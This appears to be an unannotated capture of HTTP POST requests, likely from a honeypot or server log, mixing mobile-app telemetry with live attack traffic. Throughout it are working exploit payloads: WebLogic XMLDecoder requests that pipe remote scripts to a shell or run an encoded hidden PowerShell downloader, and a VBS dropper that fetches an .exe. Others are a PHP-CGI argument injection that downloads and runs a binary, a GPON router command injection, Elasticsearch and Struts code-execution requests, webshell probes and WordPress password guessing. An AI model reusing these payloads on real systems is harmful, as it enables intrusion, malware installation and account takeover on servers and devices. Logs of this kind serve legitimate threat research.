POST http://check.proxyradar.com/azenv.php?auth=149396420799&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=xxxxxx
POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
<? system("cd /tmp ; wget http://mafiagalati.hi2.ro/unix ; curl -O http://mafiagalati.hi2.ro/unix ; fetch http://mafiagalati.hi2.ro/unix ; chmod +x unix ; ./unix ; rm -rf unix "); ?>
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=qwaszx
POST http://t11.proxy-checks.com/favicon.ico HTTP/1.1
Host: t11.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache
BlvkxSdFVtnlNIFRT1yH86X0nsbNPTfjIf6wNYAfeHjfRx/M+ViwpYCiWWOZHd70d0a+hsgus8YhX+4ixthy4MyIgVpekTd0p0yeNzrFBT5Ug+VkzL1lYFx1MSKBdFByROo7vWSZ0EJXhKa+uC8U6C7eokW3ePYY/0L58mfJH/26I7xe0LakmjJaz4Sp50xmzLYIE9hJAmYfrQxD/jplvw0jHx8BES7PHX89BBI8LjMal1G/JN62GFgWM0EZXx4FDtPTBPeNz3G8NUlBZ6YnfxaedFeAK8zscqH6NCYHguhf/mH9XMRsB6Jl2XUpDpGduNDrTbiDVUBils3qw3rYJmsFuxIn6VFrg8tdLTsH+/sOEmzcsRM1k22nSs0MT2NpGA==
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1495362169294
X-Umeng-Sdk: Android/6.0.4 Subway+rush%2F1.1.1+MI+4LTE%2F4.4.4+BE6EA616F4A88C79AB737EB2C10FAA27
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 5058
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅI™cÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1049
Content-Type: multipart/form-data; boundary=WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
791011
--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
e655030fcbff063fdbb8c9732f13c671
--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--WD0hk4AjVqTAnzxV50AuSLBaNxDBFuUzPH9--
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å®}fi›Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /sdk HTTP/1.1
Content-Length: 441
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache
Al+ymSVHU1KsZ5HDe6ahJJNw2iFn181ZAQwoU0S4XT1dyIbedDQLgfILFTWVSk9en7JmbTFbdRtYQxiOSCIOp37N+MXKAlNgRZXMqvHo41KxgqiSbYRKWC+v2mdprCVZwRlQyuBOBnR4OsWnLQDT9DacmKOww5uGWJ9BO3n1xqa95tUOI2fXtos+HzNqpS43OD9/4XFbi7y90v/qq4Iys8YS3XwCw/ZN/RPzvghH3IVxV9ZFmQ+dguJMSu/xcT3ECehJl7lFN7ZBDQQgyLJdN9fA/1h3nm35I5JxKm4BCGNzjbsCn7CyC0SBqr5EiPg8vWC1y0pKLgnSrsWzmgdQAW/hOXTK8ZAIkb+TcDU3Po5MoPbeH8/x8YIumHr3AIaeQrJWh0NeqssWy8yfmNV5cxORbN4sLWB0WfdV6PxVpZAchZI9MPETFaPc
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1037
Content-Type: multipart/form-data; boundary=-sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
871828
---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
db46af11c5de78e66ad849eb717c1caf
---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
---sWVtHkfDihHjOe0Xh1nzRX58HYN7ahCe--
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=172&pwd=test123
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
content-type: text/xml
Content-Length: 1217
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>powershell -Command &quot;$r = [System.Net.WebRequest]::Create(&apos;http://91.213.8.66/qwerty&apos;); $resp = $r.GetResponse();&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1081
Content-Type: multipart/form-data; boundary=a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
169834
--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
81f4116c461992cc961e363809ac31b0
--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--a63RPV8O9txVdq06wStzPFs7g48ZtZcib0HtJZIg--
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
m=die((string)(111111111*9))
POST /login.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: x.x.x.x:8080
Content-Length: 553
Expect: 100-continue
Connection: Keep-Alive
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂”âÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=p@ssword
POST /command.php HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1061
Content-Type: multipart/form-data; boundary=7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
231045
--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
da8918855b53ef2d02eee21e87544ffc
--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A-
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--7AD5aLC1_-F9bAK3l9usUHxcz1-UIsd3ET8A---
POST http://123.249.24.233/POST_ip_port.php HTTP/1.0
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /hndUnblock.cgi HTTP/1.1
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded
